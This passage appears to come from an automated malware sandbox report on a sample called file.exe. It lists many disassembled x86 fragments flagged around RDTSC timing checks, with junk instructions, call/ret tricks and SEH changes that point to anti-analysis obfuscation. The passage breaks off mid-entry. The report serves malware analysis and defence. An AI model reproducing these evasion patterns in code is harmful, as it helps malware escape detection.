                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23BD87 second address: 23BD8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C10F second address: 23C12A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jnp 00007F84B0B050DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C12A second address: 23C18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F84B0D655FCh 0x0000000a jl 00007F84B0D655F6h 0x00000010 popad 0x00000011 nop 0x00000012 stc 0x00000013 xor dword ptr [ebp+12488C8Ah], esi 0x00000019 xchg eax, ebx 0x0000001a jnc 00007F84B0D65614h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jl 00007F84B0D655F6h 0x0000002a jmp 00007F84B0D65608h 0x0000002f popad 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D005 second address: 23D009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D009 second address: 23D024 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D65601h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D024 second address: 23D0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F84B0B050E5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F84B0B050D8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 js 00007F84B0B050E4h 0x0000002e pushad 0x0000002f mov eax, dword ptr [ebp+122D2AFEh] 0x00000035 mov edi, dword ptr [ebp+122D2C82h] 0x0000003b popad 0x0000003c cmc 0x0000003d push 00000000h 0x0000003f pushad 0x00000040 movsx edi, ax 0x00000043 mov bx, D35Bh 0x00000047 popad 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007F84B0B050D8h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 movsx esi, dx 0x00000067 xchg eax, ebx 0x00000068 pushad 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D0A6 second address: 23D0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D0AC second address: 23D0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F84B0B050DBh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E092 second address: 23E096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E096 second address: 23E0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240312 second address: 240319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23F4FB second address: 23F505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F84B0B050D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240DC1 second address: 240E22 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0D655F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f pushad 0x00000010 mov edi, dword ptr [ebp+122D3839h] 0x00000016 push ebx 0x00000017 and eax, dword ptr [ebp+122D394Bh] 0x0000001d pop ecx 0x0000001e popad 0x0000001f sub dword ptr [ebp+122D393Fh], ebx 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D3858h] 0x0000002d jmp 00007F84B0D655FDh 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F84B0D655F8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov esi, ecx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240E22 second address: 240E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240E26 second address: 240E3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240E3E second address: 240E48 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84B0B050DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 241852 second address: 24186B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jnp 00007F84B0D655F6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F84B0D655FCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24186B second address: 24186F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24186F second address: 241879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F84B0D655F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 241879 second address: 2418DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F84B0B050D8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F84B0B050D8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D27D7h], ebx 0x00000045 or dword ptr [ebp+122D2909h], esi 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+122D27D2h], esi 0x00000053 xchg eax, ebx 0x00000054 jbe 00007F84B0B050DEh 0x0000005a push edi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242149 second address: 24214D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2457F8 second address: 2457FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24595B second address: 245973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D655FEh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2478CE second address: 2478DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2478DC second address: 247950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F84B0D6560Fh 0x0000000f popad 0x00000010 nop 0x00000011 movsx edi, ax 0x00000014 push 00000000h 0x00000016 jmp 00007F84B0D65601h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F84B0D655F8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d pop edx 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2498B1 second address: 2498BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007F84B0B050D6h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2498BD second address: 2498C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 247AB9 second address: 247ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2A57 second address: 1F2A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jg 00007F84B0D655F6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 247B7F second address: 247B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E2h 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2A68 second address: 1F2A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D65601h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 247B96 second address: 247BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2A7E second address: 1F2A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2A84 second address: 1F2AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0B050E2h 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F84B0B050D6h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2AA7 second address: 1F2AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2AAF second address: 1F2AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2AB5 second address: 1F2AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24AF36 second address: 24AF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24AF3A second address: 24AF3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24BE58 second address: 24BE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F84B0B050D6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B138 second address: 24B13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24BE66 second address: 24BEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F84B0B050D6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f and bx, B93Ch 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F84B0B050D8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122DB75Fh], edx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F84B0B050DFh 0x00000040 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B13C second address: 24B140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24BEB4 second address: 24BEBE instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0B050DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B140 second address: 24B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B146 second address: 24B16E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0B050E8h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B24A second address: 24B254 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24C054 second address: 24C05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24C05B second address: 24C0F8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F84B0D655F6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D38A5h] 0x00000015 mov bx, si 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F84B0D655F8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 cld 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 movzx ebx, di 0x00000044 mov eax, dword ptr [ebp+122D0DA1h] 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F84B0D655F8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 mov ebx, dword ptr [ebp+122D2A3Eh] 0x0000006a push FFFFFFFFh 0x0000006c clc 0x0000006d nop 0x0000006e jne 00007F84B0D655FAh 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F84B0D655FFh 0x0000007d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24DC53 second address: 24DC57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24DC57 second address: 24DC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0D65602h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24DC77 second address: 24DC81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24DC81 second address: 24DCE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, 0CDFFFF4h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F84B0D655F8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D23EAh], edx 0x00000031 push 00000000h 0x00000033 jmp 00007F84B0D655FAh 0x00000038 xor edi, dword ptr [ebp+122D33ABh] 0x0000003e xchg eax, esi 0x0000003f push edi 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 pop edi 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 ja 00007F84B0D655F6h 0x0000004f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 251ADD second address: 251AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F84B0B050F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0B050DFh 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 251AFC second address: 251B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252B80 second address: 252B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F84B0B050D6h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252B90 second address: 252BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b mov edi, 5D9211F7h 0x00000010 push 00000000h 0x00000012 sub dword ptr [ebp+122D23A3h], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F84B0D655F8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 and bl, FFFFFFCDh 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252BDE second address: 252BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E6h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252BFC second address: 252C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253B33 second address: 253BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F84B0B050D8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 and di, F47Bh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F84B0B050D8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 sub dword ptr [ebp+1246280Eh], edi 0x0000004a push 00000000h 0x0000004c mov edi, dword ptr [ebp+122D1C8Ah] 0x00000052 jmp 00007F84B0B050E8h 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jmp 00007F84B0B050E7h 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253BC8 second address: 253BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0D65603h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253BE4 second address: 253BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253BEA second address: 253BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250C8A second address: 250C9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F84B0B050D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250C9C second address: 250CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250CA1 second address: 250D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F84B0B050E9h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 or ebx, 3BA8A5A0h 0x0000001c or dword ptr [ebp+1246A2CCh], eax 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push ebx 0x0000002a jnc 00007F84B0B050DCh 0x00000030 pop ebx 0x00000031 mov di, 1649h 0x00000035 mov eax, dword ptr [ebp+122D0269h] 0x0000003b mov edi, dword ptr [ebp+122D229Ah] 0x00000041 push FFFFFFFFh 0x00000043 mov di, ax 0x00000046 push edx 0x00000047 pop edi 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b js 00007F84B0B050E4h 0x00000051 jmp 00007F84B0B050DEh 0x00000056 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250D28 second address: 250D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252D53 second address: 252D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 250D41 second address: 250D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252D57 second address: 252D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 252D64 second address: 252E08 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D33A1h], edx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D23F8h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F84B0D655F8h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 movsx edi, bx 0x00000043 mov edi, dword ptr [ebp+12462BFCh] 0x00000049 mov eax, dword ptr [ebp+122D0275h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F84B0D655F8h 0x00000057 pop ebx 